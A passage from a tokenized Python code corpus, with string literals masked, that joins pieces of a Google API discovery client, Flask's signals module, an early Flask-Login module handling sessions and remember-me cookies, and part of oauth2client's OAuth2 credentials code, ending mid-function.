, methodDesc , rootDesc , schema ) <EOL> self . _set_dynamic_attr ( fixedMethodName , <EOL> method . __get__ ( self , self . 
__class__ ) ) <EOL> def _add_nested_resources ( self , resourceDesc , rootDesc , schema ) : <EOL> if '<STR_LIT>' in resourceDesc : <EOL> def createResourceMethod ( methodName , methodDesc ) : <EOL> """<STR_LIT>""" <EOL> methodName = fix_method_name ( methodName ) <EOL> def methodResource ( self ) : <EOL> return Resource ( http = self . _http , baseUrl = self . _baseUrl , <EOL> model = self . _model , developerKey = self . _developerKey , <EOL> requestBuilder = self . _requestBuilder , <EOL> resourceDesc = methodDesc , rootDesc = rootDesc , <EOL> schema = schema ) <EOL> setattr ( methodResource , '<STR_LIT>' , '<STR_LIT>' ) <EOL> setattr ( methodResource , '<STR_LIT>' , True ) <EOL> return ( methodName , methodResource ) <EOL> for methodName , methodDesc in resourceDesc [ '<STR_LIT>' ] . iteritems ( ) : <EOL> fixedMethodName , method = createResourceMethod ( methodName , methodDesc ) <EOL> self . _set_dynamic_attr ( fixedMethodName , <EOL> method . __get__ ( self , self . __class__ ) ) <EOL> def _add_next_methods ( self , resourceDesc , schema ) : <EOL> if '<STR_LIT>' in resourceDesc : <EOL> for methodName , methodDesc in resourceDesc [ '<STR_LIT>' ] . iteritems ( ) : <EOL> if '<STR_LIT>' in methodDesc : <EOL> responseSchema = methodDesc [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in responseSchema : <EOL> responseSchema = schema . get ( responseSchema [ '<STR_LIT>' ] ) <EOL> hasNextPageToken = '<STR_LIT>' in responseSchema . get ( '<STR_LIT>' , <EOL> { } ) <EOL> hasPageToken = '<STR_LIT>' in methodDesc . get ( '<STR_LIT>' , { } ) <EOL> if hasNextPageToken and hasPageToken : <EOL> fixedMethodName , method = createNextMethod ( methodName + '<STR_LIT>' ) <EOL> self . _set_dynamic_attr ( fixedMethodName , <EOL> method . __get__ ( self , self . __class__ ) ) </s>
<s> """<STR_LIT>""" <EOL> signals_available = False <EOL> try : <EOL> from blinker import Namespace <EOL> signals_available = True <EOL> except ImportError : <EOL> class Namespace ( object ) : <EOL> def signal ( self , name , doc = None ) : <EOL> return _FakeSignal ( name , doc ) <EOL> class _FakeSignal ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , doc = None ) : <EOL> self . name = name <EOL> self . __doc__ = doc <EOL> def _fail ( self , * args , ** kwargs ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> send = lambda * a , ** kw : None <EOL> connect = disconnect = has_receivers_for = receivers_for = temporarily_connected_to = connected_to = _fail <EOL> del _fail <EOL> _signals = Namespace ( ) <EOL> template_rendered = _signals . signal ( '<STR_LIT>' ) <EOL> request_started = _signals . signal ( '<STR_LIT>' ) <EOL> request_finished = _signals . signal ( '<STR_LIT>' ) <EOL> request_tearing_down = _signals . signal ( '<STR_LIT>' ) <EOL> got_request_exception = _signals . signal ( '<STR_LIT>' ) <EOL> appcontext_tearing_down = _signals . signal ( '<STR_LIT>' ) <EOL> appcontext_pushed = _signals . signal ( '<STR_LIT>' ) <EOL> appcontext_popped = _signals . signal ( '<STR_LIT>' ) <EOL> message_flashed = _signals . signal ( '<STR_LIT>' ) </s>
<s> import flask <EOL> app = flask . Flask ( __name__ ) </s>
<s> '''<STR_LIT>''' <EOL> __version_info__ = ( '<STR_LIT:0>' , '<STR_LIT:2>' , '<STR_LIT>' ) <EOL> __version__ = '<STR_LIT:.>' . join ( __version_info__ ) <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> __all__ = [ '<STR_LIT>' ] <EOL> from flask import ( _request_ctx_stack , abort , current_app , flash , redirect , <EOL> request , session , url_for ) <EOL> from flask . signals import Namespace <EOL> from werkzeug . local import LocalProxy <EOL> from werkzeug . security import safe_str_cmp <EOL> from werkzeug . urls import url_decode , url_encode <EOL> from datetime import datetime , timedelta <EOL> from functools import wraps <EOL> from hashlib import sha1 , md5 <EOL> import hmac <EOL> import warnings <EOL> import sys <EOL> if sys . version < '<STR_LIT:3>' : <EOL> from urlparse import urlparse , urlunparse <EOL> else : <EOL> from urllib . parse import urlparse , urlunparse <EOL> unicode = str <EOL> _signals = Namespace ( ) <EOL> current_user = LocalProxy ( lambda : _get_user ( ) or <EOL> current_app . login_manager . anonymous_user ( ) ) <EOL> COOKIE_NAME = '<STR_LIT>' <EOL> COOKIE_DURATION = timedelta ( days = <NUM_LIT> ) <EOL> COOKIE_SECURE = None <EOL> COOKIE_HTTPONLY = False <EOL> LOGIN_MESSAGE = u'<STR_LIT>' <EOL> LOGIN_MESSAGE_CATEGORY = '<STR_LIT:message>' <EOL> REFRESH_MESSAGE = u'<STR_LIT>' <EOL> REFRESH_MESSAGE_CATEGORY = '<STR_LIT:message>' <EOL> class LoginManager ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , app = None , add_context_processor = True ) : <EOL> self . anonymous_user = AnonymousUserMixin <EOL> self . login_view = None <EOL> self . login_message = LOGIN_MESSAGE <EOL> self . login_message_category = LOGIN_MESSAGE_CATEGORY <EOL> self . refresh_view = None <EOL> self . needs_refresh_message = REFRESH_MESSAGE <EOL> self . needs_refresh_message_category = REFRESH_MESSAGE_CATEGORY <EOL> self . session_protection = '<STR_LIT>' <EOL> self . token_callback = None <EOL> self . 
user_callback = None <EOL> self . unauthorized_callback = None <EOL> self . needs_refresh_callback = None <EOL> if app is not None : <EOL> self . init_app ( app , add_context_processor ) <EOL> def setup_app ( self , app , add_context_processor = True ) : <EOL> '''<STR_LIT>''' <EOL> warnings . warn ( '<STR_LIT>' , <EOL> DeprecationWarning ) <EOL> self . init_app ( app , add_context_processor ) <EOL> def init_app ( self , app , add_context_processor = True ) : <EOL> '''<STR_LIT>''' <EOL> app . login_manager = self <EOL> app . before_request ( self . _load_user ) <EOL> app . after_request ( self . _update_remember_cookie ) <EOL> self . _login_disabled = app . config . get ( '<STR_LIT>' , <EOL> app . config . get ( '<STR_LIT>' , False ) ) <EOL> if add_context_processor : <EOL> app . context_processor ( _user_context_processor ) <EOL> def unauthorized ( self ) : <EOL> '''<STR_LIT>''' <EOL> user_unauthorized . send ( current_app . _get_current_object ( ) ) <EOL> if self . unauthorized_callback : <EOL> return self . unauthorized_callback ( ) <EOL> if not self . login_view : <EOL> abort ( <NUM_LIT> ) <EOL> if self . login_message : <EOL> flash ( self . login_message , category = self . login_message_category ) <EOL> return redirect ( login_url ( self . login_view , request . url ) ) <EOL> def user_loader ( self , callback ) : <EOL> '''<STR_LIT>''' <EOL> self . user_callback = callback <EOL> return callback <EOL> def token_loader ( self , callback ) : <EOL> '''<STR_LIT>''' <EOL> self . token_callback = callback <EOL> return callback <EOL> def unauthorized_handler ( self , callback ) : <EOL> '''<STR_LIT>''' <EOL> self . unauthorized_callback = callback <EOL> return callback <EOL> def needs_refresh_handler ( self , callback ) : <EOL> '''<STR_LIT>''' <EOL> self . needs_refresh_callback = callback <EOL> return callback <EOL> def needs_refresh ( self ) : <EOL> '''<STR_LIT>''' <EOL> user_needs_refresh . send ( current_app . _get_current_object ( ) ) <EOL> if self . 
needs_refresh_callback : <EOL> return self . needs_refresh_callback ( ) <EOL> if not self . refresh_view : <EOL> abort ( <NUM_LIT> ) <EOL> flash ( self . needs_refresh_message , <EOL> category = self . needs_refresh_message_category ) <EOL> return redirect ( login_url ( self . refresh_view , request . url ) ) <EOL> def reload_user ( self ) : <EOL> ctx = _request_ctx_stack . top <EOL> user_id = session . get ( '<STR_LIT>' ) <EOL> if user_id is None : <EOL> ctx . user = self . anonymous_user ( ) <EOL> else : <EOL> user = self . user_callback ( user_id ) <EOL> if user is None : <EOL> logout_user ( ) <EOL> else : <EOL> ctx . user = user <EOL> def _load_user ( self ) : <EOL> config = current_app . config <EOL> if config . get ( '<STR_LIT>' , self . session_protection ) : <EOL> deleted = self . _session_protection ( ) <EOL> if deleted : <EOL> self . reload_user ( ) <EOL> return <EOL> cookie_name = config . get ( '<STR_LIT>' , COOKIE_NAME ) <EOL> if cookie_name in request . cookies and '<STR_LIT>' not in session : <EOL> return self . _load_from_cookie ( request . cookies [ cookie_name ] ) <EOL> return self . reload_user ( ) <EOL> def _session_protection ( self ) : <EOL> sess = session . _get_current_object ( ) <EOL> ident = _create_identifier ( ) <EOL> if '<STR_LIT>' not in sess : <EOL> sess [ '<STR_LIT>' ] = ident <EOL> elif ident != sess [ '<STR_LIT>' ] : <EOL> app = current_app . _get_current_object ( ) <EOL> mode = app . config . get ( '<STR_LIT>' , <EOL> self . session_protection ) <EOL> if mode == '<STR_LIT>' or sess . permanent : <EOL> sess [ '<STR_LIT>' ] = False <EOL> session_protected . send ( app ) <EOL> return False <EOL> elif mode == '<STR_LIT>' : <EOL> sess . clear ( ) <EOL> sess [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> session_protected . send ( app ) <EOL> return True <EOL> return False <EOL> def _load_from_cookie ( self , cookie ) : <EOL> if self . token_callback : <EOL> user = self . 
token_callback ( cookie ) <EOL> if user is not None : <EOL> session [ '<STR_LIT>' ] = user . get_id ( ) <EOL> session [ '<STR_LIT>' ] = False <EOL> _request_ctx_stack . top . user = user <EOL> else : <EOL> self . reload_user ( ) <EOL> else : <EOL> user_id = decode_cookie ( cookie ) <EOL> if user_id is not None : <EOL> session [ '<STR_LIT>' ] = user_id <EOL> session [ '<STR_LIT>' ] = False <EOL> self . reload_user ( ) <EOL> app = current_app . _get_current_object ( ) <EOL> user_loaded_from_cookie . send ( app , user = _get_user ( ) ) <EOL> def _update_remember_cookie ( self , response ) : <EOL> if '<STR_LIT>' in session : <EOL> operation = session . pop ( '<STR_LIT>' , None ) <EOL> if operation == '<STR_LIT>' and '<STR_LIT>' in session : <EOL> self . _set_cookie ( response ) <EOL> elif operation == '<STR_LIT>' : <EOL> self . _clear_cookie ( response ) <EOL> return response <EOL> def _set_cookie ( self , response ) : <EOL> config = current_app . config <EOL> cookie_name = config . get ( '<STR_LIT>' , COOKIE_NAME ) <EOL> duration = config . get ( '<STR_LIT>' , COOKIE_DURATION ) <EOL> domain = config . get ( '<STR_LIT>' ) <EOL> secure = config . get ( '<STR_LIT>' , COOKIE_SECURE ) <EOL> httponly = config . get ( '<STR_LIT>' , COOKIE_HTTPONLY ) <EOL> if self . token_callback : <EOL> data = current_user . get_auth_token ( ) <EOL> else : <EOL> data = encode_cookie ( str ( session [ '<STR_LIT>' ] ) ) <EOL> expires = datetime . utcnow ( ) + duration <EOL> response . set_cookie ( cookie_name , <EOL> value = data , <EOL> expires = expires , <EOL> domain = domain , <EOL> secure = secure , <EOL> httponly = httponly ) <EOL> def _clear_cookie ( self , response ) : <EOL> config = current_app . config <EOL> cookie_name = config . get ( '<STR_LIT>' , COOKIE_NAME ) <EOL> domain = config . get ( '<STR_LIT>' ) <EOL> response . 
delete_cookie ( cookie_name , domain = domain ) <EOL> class UserMixin ( object ) : <EOL> '''<STR_LIT>''' <EOL> def is_active ( self ) : <EOL> return True <EOL> def is_authenticated ( self ) : <EOL> return True <EOL> def is_anonymous ( self ) : <EOL> return False <EOL> def get_id ( self ) : <EOL> try : <EOL> return unicode ( self . id ) <EOL> except AttributeError : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def __eq__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( other , UserMixin ) : <EOL> return self . get_id ( ) == other . get_id ( ) <EOL> return NotImplemented <EOL> def __ne__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> equal = self . __eq__ ( other ) <EOL> if equal is NotImplemented : <EOL> return NotImplemented <EOL> return not equal <EOL> class AnonymousUserMixin ( object ) : <EOL> '''<STR_LIT>''' <EOL> def is_authenticated ( self ) : <EOL> return False <EOL> def is_active ( self ) : <EOL> return False <EOL> def is_anonymous ( self ) : <EOL> return True <EOL> def get_id ( self ) : <EOL> return <EOL> def encode_cookie ( payload ) : <EOL> '''<STR_LIT>''' <EOL> return u'<STR_LIT>' . format ( payload , _cookie_digest ( payload ) ) <EOL> def decode_cookie ( cookie ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> payload , digest = cookie . rsplit ( u'<STR_LIT:|>' , <NUM_LIT:1> ) <EOL> if hasattr ( digest , '<STR_LIT>' ) : <EOL> digest = digest . decode ( '<STR_LIT:ascii>' ) <EOL> except ValueError : <EOL> return <EOL> if safe_str_cmp ( _cookie_digest ( payload ) , digest ) : <EOL> return payload <EOL> def make_next_param ( login_url , current_url ) : <EOL> '''<STR_LIT>''' <EOL> l = urlparse ( login_url ) <EOL> c = urlparse ( current_url ) <EOL> if ( not l . scheme or l . scheme == c . scheme ) and ( not l . netloc or l . netloc == c . netloc ) : <EOL> return urlunparse ( ( '<STR_LIT>' , '<STR_LIT>' , c . path , c . params , c . 
query , '<STR_LIT>' ) ) <EOL> return current_url <EOL> def login_url ( login_view , next_url = None , next_field = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if login_view . startswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:/>' ) ) : <EOL> base = login_view <EOL> else : <EOL> base = url_for ( login_view ) <EOL> if next_url is None : <EOL> return base <EOL> parts = list ( urlparse ( base ) ) <EOL> md = url_decode ( parts [ <NUM_LIT:4> ] ) <EOL> md [ next_field ] = make_next_param ( base , next_url ) <EOL> parts [ <NUM_LIT:4> ] = url_encode ( md , sort = True ) <EOL> return urlunparse ( parts ) <EOL> def make_secure_token ( * args , ** options ) : <EOL> '''<STR_LIT>''' <EOL> key = options . get ( '<STR_LIT:key>' ) <EOL> if key is None : <EOL> key = current_app . config [ '<STR_LIT>' ] <EOL> if hasattr ( key , '<STR_LIT>' ) : <EOL> key = key . encode ( '<STR_LIT:utf-8>' ) <EOL> l = [ s if isinstance ( s , bytes ) else s . encode ( '<STR_LIT:utf-8>' ) for s in args ] <EOL> payload = b'<STR_LIT>' . join ( l ) <EOL> token_value = hmac . new ( key , payload , sha1 ) . hexdigest ( ) <EOL> if hasattr ( token_value , '<STR_LIT>' ) : <EOL> token_value = token_value . decode ( '<STR_LIT:utf-8>' ) <EOL> return token_value <EOL> def login_fresh ( ) : <EOL> '''<STR_LIT>''' <EOL> return session . get ( '<STR_LIT>' , False ) <EOL> def login_user ( user , remember = False , force = False ) : <EOL> '''<STR_LIT>''' <EOL> if not force and not user . is_active ( ) : <EOL> return False <EOL> user_id = user . get_id ( ) <EOL> session [ '<STR_LIT>' ] = user_id <EOL> session [ '<STR_LIT>' ] = True <EOL> if remember : <EOL> session [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> _request_ctx_stack . top . user = user <EOL> user_logged_in . send ( current_app . _get_current_object ( ) , user = _get_user ( ) ) <EOL> return True <EOL> def logout_user ( ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in session : <EOL> session . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in session : <EOL> session . 
pop ( '<STR_LIT>' ) <EOL> cookie_name = current_app . config . get ( '<STR_LIT>' , COOKIE_NAME ) <EOL> if cookie_name in request . cookies : <EOL> session [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> user = _get_user ( ) <EOL> if user and not user . is_anonymous ( ) : <EOL> user_logged_out . send ( current_app . _get_current_object ( ) , user = user ) <EOL> current_app . login_manager . reload_user ( ) <EOL> return True <EOL> def confirm_login ( ) : <EOL> '''<STR_LIT>''' <EOL> session [ '<STR_LIT>' ] = True <EOL> session [ '<STR_LIT>' ] = _create_identifier ( ) <EOL> user_login_confirmed . send ( current_app . _get_current_object ( ) ) <EOL> def login_required ( func ) : <EOL> '''<STR_LIT>''' <EOL> @ wraps ( func ) <EOL> def decorated_view ( * args , ** kwargs ) : <EOL> if current_app . login_manager . _login_disabled : <EOL> return func ( * args , ** kwargs ) <EOL> elif not current_user . is_authenticated ( ) : <EOL> return current_app . login_manager . unauthorized ( ) <EOL> return func ( * args , ** kwargs ) <EOL> return decorated_view <EOL> def fresh_login_required ( func ) : <EOL> '''<STR_LIT>''' <EOL> @ wraps ( func ) <EOL> def decorated_view ( * args , ** kwargs ) : <EOL> if current_app . login_manager . _login_disabled : <EOL> return func ( * args , ** kwargs ) <EOL> elif not current_user . is_authenticated ( ) : <EOL> return current_app . login_manager . unauthorized ( ) <EOL> elif not login_fresh ( ) : <EOL> return current_app . login_manager . needs_refresh ( ) <EOL> return func ( * args , ** kwargs ) <EOL> return decorated_view <EOL> def _get_user ( ) : <EOL> return getattr ( _request_ctx_stack . top , '<STR_LIT:user>' , None ) <EOL> def _cookie_digest ( payload , key = None ) : <EOL> if key is None : <EOL> key = current_app . config [ '<STR_LIT>' ] <EOL> if hasattr ( key , '<STR_LIT>' ) : <EOL> key = key . encode ( '<STR_LIT:utf-8>' ) <EOL> return hmac . new ( key , payload . encode ( '<STR_LIT:utf-8>' ) , sha1 ) . 
hexdigest ( ) <EOL> def _get_remote_addr ( ) : <EOL> return request . headers . get ( '<STR_LIT>' , request . remote_addr ) <EOL> def _create_identifier ( ) : <EOL> base = '<STR_LIT>' . format ( _get_remote_addr ( ) , <EOL> request . headers . get ( '<STR_LIT>' ) ) <EOL> if str is bytes : <EOL> base = unicode ( base , '<STR_LIT:utf-8>' , errors = '<STR_LIT:replace>' ) <EOL> h = md5 ( ) <EOL> h . update ( base . encode ( '<STR_LIT:utf8>' ) ) <EOL> return h . hexdigest ( ) <EOL> def _user_context_processor ( ) : <EOL> return dict ( current_user = _get_user ( ) ) <EOL> user_logged_in = _signals . signal ( '<STR_LIT>' ) <EOL> user_logged_out = _signals . signal ( '<STR_LIT>' ) <EOL> user_loaded_from_cookie = _signals . signal ( '<STR_LIT>' ) <EOL> user_login_confirmed = _signals . signal ( '<STR_LIT>' ) <EOL> user_unauthorized = _signals . signal ( '<STR_LIT>' ) <EOL> user_needs_refresh = _signals . signal ( '<STR_LIT>' ) <EOL> session_protected = _signals . signal ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import base64 <EOL> import clientsecrets <EOL> import copy <EOL> import datetime <EOL> import httplib2 <EOL> import logging <EOL> import os <EOL> import sys <EOL> import time <EOL> import urllib <EOL> import urlparse <EOL> from oauth2client import GOOGLE_AUTH_URI <EOL> from oauth2client import GOOGLE_REVOKE_URI <EOL> from oauth2client import GOOGLE_TOKEN_URI <EOL> from oauth2client import util <EOL> from oauth2client . anyjson import simplejson <EOL> HAS_OPENSSL = False <EOL> HAS_CRYPTO = False <EOL> try : <EOL> from oauth2client import crypt <EOL> HAS_CRYPTO = True <EOL> if crypt . OpenSSLVerifier is not None : <EOL> HAS_OPENSSL = True <EOL> except ImportError : <EOL> pass <EOL> try : <EOL> from urlparse import parse_qsl <EOL> except ImportError : <EOL> from cgi import parse_qsl <EOL> logger = logging . getLogger ( __name__ ) <EOL> EXPIRY_FORMAT = '<STR_LIT>' <EOL> ID_TOKEN_VERIFICATON_CERTS = '<STR_LIT>' <EOL> OOB_CALLBACK_URN = '<STR_LIT>' <EOL> REFRESH_STATUS_CODES = [ <NUM_LIT> ] <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class FlowExchangeError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class AccessTokenRefreshError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class TokenRevokeError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class UnknownClientSecretsFlowError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class AccessTokenCredentialsError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class VerifyJwtTokenError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class NonAsciiHeaderError ( Error ) : <EOL> """<STR_LIT>""" <EOL> def _abstract ( ) : <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class MemoryCache ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . cache = { } <EOL> def get ( self , key ) : <EOL> return self . cache . get ( key ) <EOL> def set ( self , key , value ) : <EOL> self . cache [ key ] = value <EOL> def delete ( self , key ) : <EOL> self . cache . 
pop ( key , None ) <EOL> class Credentials ( object ) : <EOL> """<STR_LIT>""" <EOL> NON_SERIALIZED_MEMBERS = [ '<STR_LIT:store>' ] <EOL> def authorize ( self , http ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def refresh ( self , http ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def revoke ( self , http ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def apply ( self , headers ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def _to_json ( self , strip ) : <EOL> """<STR_LIT>""" <EOL> t = type ( self ) <EOL> d = copy . copy ( self . __dict__ ) <EOL> for member in strip : <EOL> if member in d : <EOL> del d [ member ] <EOL> if '<STR_LIT>' in d and isinstance ( d [ '<STR_LIT>' ] , datetime . datetime ) : <EOL> d [ '<STR_LIT>' ] = d [ '<STR_LIT>' ] . strftime ( EXPIRY_FORMAT ) <EOL> d [ '<STR_LIT>' ] = t . __name__ <EOL> d [ '<STR_LIT>' ] = t . __module__ <EOL> return simplejson . dumps ( d ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _to_json ( Credentials . NON_SERIALIZED_MEMBERS ) <EOL> @ classmethod <EOL> def new_from_json ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> data = simplejson . loads ( s ) <EOL> module = data [ '<STR_LIT>' ] <EOL> try : <EOL> m = __import__ ( module ) <EOL> except ImportError : <EOL> module = module . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> m = __import__ ( module ) <EOL> m = __import__ ( module , fromlist = module . 
split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) <EOL> kls = getattr ( m , data [ '<STR_LIT>' ] ) <EOL> from_json = getattr ( kls , '<STR_LIT>' ) <EOL> return from_json ( s ) <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> return Credentials ( ) <EOL> class Flow ( object ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Storage ( object ) : <EOL> """<STR_LIT>""" <EOL> def acquire_lock ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def release_lock ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def locked_get ( self ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def locked_put ( self , credentials ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def locked_delete ( self ) : <EOL> """<STR_LIT>""" <EOL> _abstract ( ) <EOL> def get ( self ) : <EOL> """<STR_LIT>""" <EOL> self . acquire_lock ( ) <EOL> try : <EOL> return self . locked_get ( ) <EOL> finally : <EOL> self . release_lock ( ) <EOL> def put ( self , credentials ) : <EOL> """<STR_LIT>""" <EOL> self . acquire_lock ( ) <EOL> try : <EOL> self . locked_put ( credentials ) <EOL> finally : <EOL> self . release_lock ( ) <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> self . acquire_lock ( ) <EOL> try : <EOL> return self . locked_delete ( ) <EOL> finally : <EOL> self . release_lock ( ) <EOL> def clean_headers ( headers ) : <EOL> """<STR_LIT>""" <EOL> clean = { } <EOL> try : <EOL> for k , v in headers . iteritems ( ) : <EOL> clean [ str ( k ) ] = str ( v ) <EOL> except UnicodeEncodeError : <EOL> raise NonAsciiHeaderError ( k + '<STR_LIT>' + v ) <EOL> return clean <EOL> def _update_query_params ( uri , params ) : <EOL> """<STR_LIT>""" <EOL> parts = list ( urlparse . urlparse ( uri ) ) <EOL> query_params = dict ( parse_qsl ( parts [ <NUM_LIT:4> ] ) ) <EOL> query_params . update ( params ) <EOL> parts [ <NUM_LIT:4> ] = urllib . urlencode ( query_params ) <EOL> return urlparse . 
urlunparse ( parts ) <EOL> class OAuth2Credentials ( Credentials ) : <EOL> """<STR_LIT>""" <EOL> @ util . positional ( <NUM_LIT:8> ) <EOL> def __init__ ( self , access_token , client_id , client_secret , refresh_token , <EOL> token_expiry , token_uri , user_agent , revoke_uri = None , <EOL> id_token = None , token_response = None ) : <EOL> """<STR_LIT>""" <EOL> self . access_token = access_token <EOL> self . client_id = client_id <EOL> self . client_secret = client_secret <EOL> self . refresh_token = refresh_token <EOL> self . store = None <EOL> self . token_expiry = token_expiry <EOL> self . token_uri = token_uri <EOL> self . user_agent = user_agent <EOL> self . revoke_uri = revoke_uri <EOL> self . id_token = id_token <EOL> self . token_response = token_response <EOL> self . invalid = False <EOL> def authorize ( self , http ) : <EOL> """<STR_LIT>""" <EOL> request_orig = http . request <EOL> @ util . positional ( <NUM_LIT:1> ) <EOL> def new_request ( uri , method = '<STR_LIT:GET>' , body = None , headers = None , <EOL> redirections = httplib2 . DEFAULT_MAX_REDIRECTS , <EOL> connection_type = None ) : <EOL> if not self . access_token : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . _refresh ( request_orig ) <EOL> if headers is None : <EOL> headers = { } <EOL> self . apply ( headers ) <EOL> if self . user_agent is not None : <EOL> if '<STR_LIT>' in headers : <EOL> headers [ '<STR_LIT>' ] = self . user_agent + '<STR_LIT:U+0020>' + headers [ '<STR_LIT>' ] <EOL> else : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> resp , content = request_orig ( uri , method , body , clean_headers ( headers ) , <EOL> redirections , connection_type ) <EOL> if resp . status in REFRESH_STATUS_CODES : <EOL> logger . info ( '<STR_LIT>' % str ( resp . status ) ) <EOL> self . _refresh ( request_orig ) <EOL> self . 
apply ( headers ) <EOL> return request_orig ( uri , method , body , clean_headers ( headers ) , <EOL> redirections , connection_type ) <EOL> else : <EOL> return ( resp , content ) <EOL> http . request = new_request <EOL> setattr ( http . request , '<STR_LIT>' , self ) <EOL> return http <EOL> def refresh ( self , http ) : <EOL> """<STR_LIT>""" <EOL> self . _refresh ( http . request ) <EOL> def revoke ( self , http ) : <EOL> """<STR_LIT>""" <EOL> self . _revoke ( http . request ) <EOL> def apply ( self , headers ) : <EOL> """<STR_LIT>""" <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' + self . access_token <EOL> def to_json ( self ) : <EOL> return self . _to_json ( Credentials . NON_SERIALIZED_MEMBERS ) <EOL> @ classmethod <EOL> def from_json ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> data = simplejson . loads ( s ) <EOL> if '<STR_LIT>' in data and not isinstance ( data [ '<STR_LIT>' ] , <EOL> datetime . datetime ) : <EOL> try : <EOL> data [ '<STR_LIT>' ] = datetime . datetime . strptime ( <EOL> data [ '<STR_LIT>' ] , EXPIRY_FORMAT ) <EOL> except : <EOL> data [ '<STR_LIT>' ] = None <EOL> retval = cls ( <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> data [ '<STR_LIT>' ] , <EOL> revoke_uri = data . get ( '<STR_LIT>' , None ) , <EOL> id_token = data . get ( '<STR_LIT>' , None ) , <EOL> token_response = data . get ( '<STR_LIT>' , None ) ) <EOL> retval . invalid = data [ '<STR_LIT>' ] <EOL> return retval <EOL> @ property <EOL> def access_token_expired ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . invalid : <EOL> return True <EOL> if not self . token_expiry : <EOL> return False <EOL> now = datetime . datetime . utcnow ( ) <EOL> if now >= self . token_expiry : <EOL> logger . info ( '<STR_LIT>' , <EOL> now , self . token_expiry ) <EOL> return True <EOL> return False <EOL> def set_store ( self , store ) : <EOL> """<STR_LIT>""" <EOL> self . 
store = store <EOL> def _updateFromCredential ( self , other ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( other . __getstate__ ( ) ) <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> d = copy . copy ( self . __dict__ ) <EOL> del d [ '<STR_LIT:store>' ] <EOL> return d <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( state ) <EOL> self . store = None <EOL> def _generate_refresh_request_body ( self ) : <EOL> """<STR_LIT>""" <EOL> body = urllib . urlencode ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . client_id , <EOL> '<STR_LIT>' : self . client_secret , <EOL> '<STR_LIT>' : self . refresh_token , <EOL> } ) <EOL> return body <EOL> def _generate_refresh_request_headers ( self ) : <EOL> """<STR_LIT>""" <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if self . user_agent is not None : <EOL> headers [ '<STR_LIT>' ] = self . user_agent <EOL> return headers <EOL> def _refresh ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> if not self . store : <EOL> self . _do_refresh_request ( http_request ) <EOL> else : <EOL> self . store . acquire_lock ( ) <EOL> try : <EOL> new_cred = self . store . locked_get ( ) <EOL> if ( new_cred and not new_cred . invalid and <EOL> new_cred . access_token != self . access_token ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . _updateFromCredential ( new_cred ) <EOL> else : <EOL> self . _do_refresh_request ( http_request ) <EOL> finally : <EOL> self . store . release_lock ( ) <EOL> def _do_refresh_request ( self , http_request ) : <EOL> """<STR_LIT>""" <EOL> body = self . _generate_refresh_request_body ( ) <EOL> headers = self . _generate_refresh_request_headers ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> resp , content = http_request ( <EOL> self . token_uri , method = '<STR_LIT:POST>' , body = body , headers = headers ) <EOL> if 